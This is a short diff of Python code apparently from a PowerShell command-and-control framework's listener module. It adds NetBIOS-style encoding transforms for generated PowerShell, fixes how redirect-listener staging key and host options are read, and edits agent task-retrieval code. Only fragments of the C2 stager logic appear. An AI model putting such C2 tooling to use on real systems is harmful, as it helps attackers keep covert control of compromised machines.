312 | self.generate_powershell = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_++){([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -shr 4)+65;([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -band 15)+65;}));" % {"var":var} | |
313 | self.generate_powershell_r = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_+=2){(([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_]-65) -shl 4) -bor (([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_+1]-65) -band 15);}));" % {"var":var} | |
319 | def netbiosu_powershell(var): | |
320 | return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i++){($data2[$i] -shr 4)+65;($data2[$i] -band 15)+65;}));" % {"var":var} | |
321 | ||
322 | def netbiosu_powershell_r(var): | |
323 | return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i+=2){($data2[$i]-65 -shl 4) -bor ($data2[$i+1]-65 -band 15);}));" % {"var":var} | |
314 | 324 | |
315 | 325 | def _prepend(self, string): |
316 | 326 | """Configure the `prepend` Transform, which prepends a static string to an arbitrary input. |
485 | 485 | |
486 | 486 | if redirectListenerOptions: |
487 | 487 | |
488 | self.options['RedirectStagingKey']['Value'] = redirectListenerOptions['StagingKey']['Value'] | |
489 | self.options['DefaultProfile']['Value'] = redirectListenerOptions['DefaultProfile']['Value'] | |
490 | redirectHost = redirectListenerOptions['Host']['Value'] | |
488 | self.options['RedirectStagingKey']['Value'] = redirectListenerOptions.options['StagingKey']['Value'] | |
489 | self.options['DefaultProfile']['Value'] = redirectListenerOptions.options['DefaultProfile']['Value'] | |
490 | redirectHost = redirectListenerOptions.options['Host']['Value'] | |
491 | 491 | |
492 | 492 | uris = [a for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')] |
493 | 493 |
886 | 886 | getTask += "$data = [System.Text.Encoding]::Default.GetString($data);" |
887 | 887 | |
888 | 888 | # ==== INTERPRET RESULTS ==== |
889 | getTask += profile.get.server.output.generate_powershell_r("$data"); | |
889 | getTask += profile.get.server.output.generate_powershell_r("$data") | |
890 | 890 | getTask += "$data = [System.Text.Encoding]::Default.GetBytes($data);" |
891 | 891 | |
892 | 892 | # ==== RETURN RESULTS ==== |